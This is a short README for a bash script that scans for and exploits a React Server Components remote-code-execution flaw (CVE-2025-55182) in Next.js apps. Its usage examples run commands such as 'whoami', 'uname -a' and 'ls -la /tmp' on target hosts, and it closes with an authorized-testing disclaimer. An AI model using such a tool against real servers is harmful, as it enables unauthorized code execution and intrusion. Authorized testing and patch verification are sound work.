Simple command-line tool for detecting and exploiting CVE-2025-55182 (React Server Components RCE) in Next.js applications.

chmod +x scanner.sh# Scan with default command (id)
./scanner.sh -d example.com
# Execute custom command
./scanner.sh -d example.com -c "whoami"
# With full URL
./scanner.sh -d https://example.com -c "uname -a"-d, --domain- Target domain/URL (required)-c, --command- Command to execute (default:id)
# Check if target is vulnerable
./scanner.sh -d vulnerable-app.com
# Get system information
./scanner.sh -d vulnerable-app.com -c "uname -a"
# List files
./scanner.sh -d vulnerable-app.com -c "ls -la /tmp"- Bash
- curl
- openssl
This tool is for educational and authorized security testing purposes only. Do not use against systems you don't own or have permission to test.